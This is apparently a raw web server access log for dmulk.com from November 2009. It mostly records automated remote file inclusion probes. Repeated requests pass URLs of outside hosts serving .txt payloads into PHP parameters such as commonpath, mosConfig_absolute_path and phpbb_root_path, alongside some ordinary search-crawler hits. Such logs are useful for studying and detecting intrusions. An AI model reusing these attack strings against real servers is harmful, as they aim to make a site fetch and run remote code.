114.108.177.238 - - [20/Nov/2009:08:38:39 -0800] "GET /logs/access_080415.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:39 -0800] "GET /logs/access_090505.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:39 -0800] "GET /logs/access_080724.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:39 -0800] "GET /logs/access_090925.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:39 -0800] "GET /logs/access_090523.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:39 -0800] "GET /logs/access_081014.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:39 -0800] "GET /logs/access_081027.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:41 -0800] "GET /logs/access_080718.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:41 -0800] "GET /logs/access_080519.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:41 -0800] "GET /logs/access_090531.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:41 -0800] "GET /logs/access_080415.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:41 -0800] "GET /logs/access_090505.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:41 -0800] "GET /logs/access_080724.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:41 -0800] "GET /logs/access_090925.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:41 -0800] "GET /logs/access_090523.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_080830.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_090414.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_081129.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_090517.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_080508.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_080518.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_080823.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_090426.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_090511.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_090614.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_090519.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_091109.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_080816.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:48 -0800] "GET /logs/access_090411.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:49 -0800] "GET /logs/access_090327.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:49 -0800] "GET /logs/access_081120.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:51 -0800] "GET /logs/access_081027.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:51 -0800] "GET /logs/access_081014.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:51 -0800] "GET /logs/access_090327.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:51 -0800] "GET /logs/access_081120.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:53 -0800] "GET /logs/access_081012.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:53 -0800] "GET /logs/access_081225.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:53 -0800] "GET /logs/access_080718.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:53 -0800] "GET /logs/access_080519.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:53 -0800] "GET /logs/access_090531.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:54 -0800] "GET /logs/access_090505.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:54 -0800] "GET /logs/access_080415.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:54 -0800] "GET /logs/access_080724.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:54 -0800] "GET /logs/access_090925.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:54 -0800] "GET /logs/access_090523.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:58 -0800] "GET /logs/access_080826.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:38:58 -0800] "GET /logs/access_081104.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:39:00 -0800] "GET /logs/access_080826.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:39:01 -0800] "GET /logs/access_081104.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:39:03 -0800] "GET /logs/access_081027.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:39:03 -0800] "GET /logs/access_081014.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:39:03 -0800] "GET /logs/access_090327.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:39:04 -0800] "GET /logs/access_081120.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:39:07 -0800] "GET /logs/access_080722.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:39:10 -0800] "GET /logs/access_080722.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:39:13 -0800] "GET /logs/access_080826.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:39:22 -0800] "GET /logs/access_081104.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:08:39:23 -0800] "GET /logs/access_080722.log%20%20//common/db.php?commonpath=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:39:31 -0800] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:39:37 -0800] "GET /logs/access_081106.log%20%20//include/bbs.lib.inc.php?site_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [20/Nov/2009:08:40:02 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.italianmec.com/banner/id.txt???? HTTP/1.1" 200 15966 "-" "libwww-perl/5.79" "www.dmulk.com"
79.64.223.41 - - [20/Nov/2009:08:40:03 -0800] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.237 - - [20/Nov/2009:08:40:04 -0800] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/ HTTP/1.0" 200 12631 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.213.177.58 - - [20/Nov/2009:08:40:09 -0800] "GET /logs/access_090518.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.115.237 - - [20/Nov/2009:08:40:10 -0800] "GET /blog/index.php/2008/08/12/westoc-2008-trip-61208-62708/ HTTP/1.0" 200 70533 "http://dmulk.com/blog/2008/06/09/crestoc-2008-the-movie/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.213.177.58 - - [20/Nov/2009:08:40:13 -0800] "GET /logs/access_081126.log/errors.php?error=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:08:40:13 -0800] "GET /logs/errors.php?error=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:08:40:13 -0800] "GET /logs/access_090604.log/errors.php?error=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:08:40:13 -0800] "GET /errors.php?error=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:08:40:20 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:08:40:20 -0800] "GET /logs/access_091017.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:08:40:20 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:40:21 -0800] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:40:30 -0800] "GET /logs/access_081106.log%20%20//include/bbs.lib.inc.php?site_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
90.182.58.185 - - [20/Nov/2009:08:40:37 -0800] "GET /logs/access_090805.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
220.181.53.230 - - [20/Nov/2009:08:40:46 -0800] "GET /logs/access_080424.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:41:33 -0800] "GET /logs/access_081104.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:41:33 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:41:34 -0800] "GET /logs/access_081104.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:41:34 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/Nov/2009:08:41:35 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
64.157.4.41 - - [20/Nov/2009:08:41:35 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:41:35 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sejongit.com/next.txt?? HTTP/1.1" 200 15904 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:41:35 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sejongit.com/next.txt?? HTTP/1.1" 200 15904 "-" "Mozilla/5.0" "www.dmulk.com"
189.126.114.75 - - [20/Nov/2009:08:41:55 -0800] "GET /' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:08:42:39 -0800] "GET /logs/access_070828.log HTTP/1.0" 200 86379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:08:43:20 -0800] "GET /bikes/dteel/2008_10_24/?M=A HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.245.220.82 - - [20/Nov/2009:08:43:51 -0800] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.245.220.82 - - [20/Nov/2009:08:43:51 -0800] "GET /logs/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.245.220.82 - - [20/Nov/2009:08:43:51 -0800] "GET /logs/access_090326.log/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:43:52 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:43:52 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:43:52 -0800] "GET /logs/access_090311.log%20%20//phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:43:52 -0800] "GET /logs/access_080704.log%20%20//phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.55.207.30 - - [20/Nov/2009:08:44:06 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "dmulk.com"
61.100.181.217 - - [20/Nov/2009:08:44:32 -0800] "GET /common/db.php?commonpath=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:08:44:32 -0800] "GET /logs//common/db.php?commonpath=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:08:44:32 -0800] "GET /logs/access_081108.log%20%20//common/db.php?commonpath=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:08:44:41 -0800] "GET /logs/access_080928.log%20%20//common/db.php?commonpath=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.55.207.30 - - [20/Nov/2009:08:44:56 -0800] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.1" 200 11969 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "dmulk.com"
83.103.72.130 - - [20/Nov/2009:08:45:05 -0800] "GET /logs/access_080515.log//?_SERVER[DOCUMENT_ROOT]=http://www.italianmec.com/banner/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
83.103.72.130 - - [20/Nov/2009:08:45:06 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.italianmec.com/banner/id.txt???? HTTP/1.1" 200 15965 "-" "libwww-perl/5.79" "www.dmulk.com"
83.103.72.130 - - [20/Nov/2009:08:45:07 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.italianmec.com/banner/id.txt???? HTTP/1.1" 200 126791 "-" "libwww-perl/5.79" "www.dmulk.com"
216.245.220.82 - - [20/Nov/2009:08:45:42 -0800] "GET /logs/access_090326.log%20%20/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [20/Nov/2009:08:45:43 -0800] "GET /logs/access_080524.log//?_SERVER[DOCUMENT_ROOT]=http://www.italianmec.com/banner/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:45:54 -0800] "GET /modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:45:54 -0800] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:45:54 -0800] "GET /logs/access_080415.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:46:01 -0800] "GET /logs/access_080320.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.200 - - [20/Nov/2009:08:46:09 -0800] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0145.jpg HTTP/1.1" 200 59924 "-" "Googlebot-Image/1.0" "dmulk.com"
190.95.231.98 - - [20/Nov/2009:08:46:15 -0800] "GET /logs/access_081107.log//appserv/main.php?appserv_root=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:08:46:15 -0800] "GET /logs//appserv/main.php?appserv_root=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:08:46:15 -0800] "GET /appserv/main.php?appserv_root=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:08:46:45 -0800] "GET /logs/access_071228.log/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:08:46:45 -0800] "GET /logs/access_080526.log/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:46:46 -0800] "GET /logs/access_080704.log//phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:46:46 -0800] "GET /logs/access_090311.log//phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:46:47 -0800] "GET /logs/access_080320.log%20%20//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.245.220.82 - - [20/Nov/2009:08:47:03 -0800] "GET /logs/access_090619.log%20%20/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.186.11.35 - - [20/Nov/2009:08:47:13 -0800] "GET /logs/access_080219.log//modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.lastuacoe.it/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
